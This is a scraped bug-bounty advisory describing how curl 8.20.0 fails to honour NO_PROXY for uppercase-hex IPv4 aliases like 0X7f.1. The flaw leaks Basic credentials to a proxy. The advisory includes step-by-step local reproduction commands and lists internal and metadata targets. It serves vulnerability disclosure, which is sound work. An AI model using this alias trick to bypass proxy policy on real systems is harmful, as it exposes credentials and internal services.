{“lastseen”:”2026-06-03T08:27:59″,”description”:”## Summary:\\ncurl\/libcurl 8.20.0 fails to enforce `CURLOPT_NOPROXY`, `–noproxy`, and `NO_PROXY` consistently for uppercase-hex IPv4 aliases such as `0X7f.1` on glibc-based systems that accept these legacy numeric IPv4 forms.\\n\\nWhen a canonical IP literal is excluded from proxying, curl sends the canonical form directly as configured. However, an equivalent uppercase-hex alias for the same IP is not recognized by the no-proxy matching path and is instead sent to the configured proxy.\\n\\nIn my reproductions, this causes built-in HTTP Basic credentials to be disclosed to the proxy. This is a proxy-boundary bypass \/ policy-vs-resolution mismatch, not an SSRF claim.\\n\\n## Steps To Reproduce:\\nThe main reproduction below uses the non-debug 8.20.0 CLI path and `NO_PROXY`, which I found to be the strongest and most common policy path. The same root cause also reproduces through `–noproxy` and `CURLOPT_NOPROXY`; supporting artifacts are attached.\\n\\n1. Build curl 8.20.0 from the official release tarball as a non-debug build:\\n cd \/tmp\\n curl -fsSLO https:\/\/curl.se\/download\/curl-8.20.0.tar.xz\\n mkdir \/tmp\/curl-8.20.0-src \/tmp\/curl-8.20.0-relbuild2\\n tar -xf \/tmp\/curl-8.20.0.tar.xz -C \/tmp\/curl-8.20.0-src –strip-components=1\\n cd \/tmp\/curl-8.20.0-relbuild2\\n \/tmp\/curl-8.20.0-src\/configure \\\\\\n –with-openssl \\\\\\n –without-libidn2 \\\\\\n –without-libpsl \\\\\\n –without-brotli \\\\\\n –without-zstd \\\\\\n –without-libssh2 \\\\\\n –without-nghttp2 \\\\\\n –disable-ldap \\\\\\n –disable-ldaps \\\\\\n –disable-ftp \\\\\\n –disable-file \\\\\\n –disable-tftp \\\\\\n –disable-rtsp \\\\\\n –disable-dict \\\\\\n –disable-telnet \\\\\\n –disable-pop3 \\\\\\n –disable-imap \\\\\\n –disable-smb \\\\\\n –disable-smtp \\\\\\n –disable-gopher \\\\\\n –disable-mqtt \\\\\\n –disable-manual\\n make -j2\\n\\n2. Start the attached local target\/proxy logger:\\npython3 \/tmp\/curl_proxy_boundary_probe.py\\n\\nThis starts:\\na target on 127.0.0.1:18081\\na logging proxy on 127.0.0.1:18082\\n\\n3. Run the canonical control request:\\nNO_PROXY=127.0.0.1 \\\\\\n\/tmp\/curl-8.20.0-relbuild2\/src\/curl -sv \\\\\\n –proxy http:\/\/127.0.0.1:18082 \\\\\\n -u alice:sekret –basic \\\\\\n http:\/\/127.0.0.1:18081\/\\n\\nObserve:\\ncurl connects directly to 127.0.0.1:18081\\nthe response is 200\\n\\n4. Run the uppercase-hex alias request with the same policy:\\nNO_PROXY=127.0.0.1 \\\\\\n\/tmp\/curl-8.20.0-relbuild2\/src\/curl -sv \\\\\\n –proxy http:\/\/127.0.0.1:18082 \\\\\\n -u alice:sekret –basic \\\\\\n http:\/\/0X7f.1:18081\/\\n\\nObserve:\\ncurl prints Uses proxy env variable NO_PROXY == ‘127.0.0.1’\\nthe request is sent to the proxy instead of directly to the target\\nthe response is 502 from the logging proxy\\nbuilt-in Authorization: Basic YWxpY2U6c2VrcmV0 is visible in the proxy-side request\\n\\n5. Check the server-side log:\\nsed -n ‘1,20p’ \/tmp\/curl_proxy_boundary_probe.log\\n\\nRepresentative result:\\ntarget … GET \/ … Host: 127.0.0.1:18081 Authorization: Basic YWxpY2U6c2VrcmV0\\nproxy … GET http:\/\/0X7f.1:18081\/ … Host: 0X7f.1:18081 Authorization: Basic YWxpY2U6c2VrcmV0\\n\\n6. Additional verified variants included in the attached bundle:\\n–noproxy 127.0.0.1\\nNO_PROXY=127.0.0.0\/8\\nCURLOPT_NOPROXY through a non-debug libcurl PoC\\ninternal\/private target classes reproduced in controlled local setups:\\n10.0.0.0\/8\\n172.16.0.0\/12\\n192.168.0.0\/16\\n169.254.169.254\\nsecond full runtime reproduction in a Debian bookworm-slim container\\n\\n###Affected version\\nPrimary affected release reproduced locally from the official source tarball:\\ncurl 8.20.0 (x86_64-pc-linux-gnu) libcurl\/8.20.0 OpenSSL\/3.6.1 zlib\/1.3.1\\nRelease-Date: 2026-04-29\\nProtocols: http https ipfs ipns ws wss\\nFeatures: alt-svc AsynchDNS HSTS HTTPS-proxy IPv6 Largefile libz SSL threadsafe TLS-SRP UnixSockets\\n\\nEnvironment details:\\nhost runtime reproduction on glibc 2.42\\nsecond full runtime reproduction in Debian bookworm-slim (glibc 2.36)\\n\\nI also reproduced the same sink on current master at commit:\\n24874a4f04\\n\\n###Supporting Material\/References:\\nAttached bundle: curl_noproxy_uppercase_hex_bundle_2026-06-01.zip\\nKey included artifacts:\\nnoproxy_env_loopback.log\\ndebian_container_probe.log\\ncurl_noproxy_alias_poc.c\\ncurl_proxy_boundary_probe.py\\nrun_debian_container_noproxy_probe.sh\\nrun_noproxy_private_ns_probe.sh\\nREPORT_curl_noproxy_uppercase_hex.md\\n\\nRoot cause notes:\\nlib\/noproxy.c only takes the IP\/CIDR matching path when inet_pton() accepts the host string as IPv4\\nlib\/urlapi.c normalizes lowercase 0x numeric IPv4 forms, but not uppercase 0X\\nglibc-based resolvers used in my reproductions still accept uppercase-hex legacy numeric IPv4 aliases and resolve them to the same target IP\\nthis creates a policy-vs-resolution mismatch: the configured off-proxy exclusion is not consistently honored for equivalent numeric forms\\n\\n## Impact\\n\\nThis issue breaks the documented off-proxy routing boundary enforced by `CURLOPT_NOPROXY`, `–noproxy`, and `NO_PROXY`.\\n\\nOn affected glibc-based systems, an uppercase-hex alias for a loopback, RFC1918, or link-local target can cause:\\n- requests that should stay off-proxy to be sent to the configured proxy instead\\n- built-in HTTP Basic credentials generated by curl\/libcurl to be disclosed to the proxy\\n- proxy exclusion policy for sensitive internal targets to be bypassed”,”published”:”2026-05-31T17:50:15″,”modified”:”2026-06-03T08:02:40″,”type”:”hackerone”,”title”:”curl: curl\/libcurl 8.20.0 NOPROXY bypass via uppercase-hex IPv4 aliases leaks off-proxy Basic credentials to the configured proxy”,”source”:””,”references”:””,”id”:”H1:3773293″,”bulletinFamily”:”bugbounty”,”cwe”:null,”cvelist”:[],”sourceData”:””,”sourceHref”:””,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/hackerone.com\/reports\/3773293″,”category_name”:”News”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-06-03T08:27:59″,”description”:”## Summary:\\ncurl\/libcurl 8.20.0 fails to enforce `CURLOPT_NOPROXY`, `–noproxy`, and `NO_PROXY` consistently for uppercase-hex IPv4 aliases such as `0X7f.1` on glibc-based systems that accept these legacy…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[6,8,12,117,13,33,7,11,5],"class_list":["post-59443","post","type-post","status-publish","format-standard","hentry","category-category_news","tag-cve","tag-cvss","tag-exploit","tag-hackerone","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n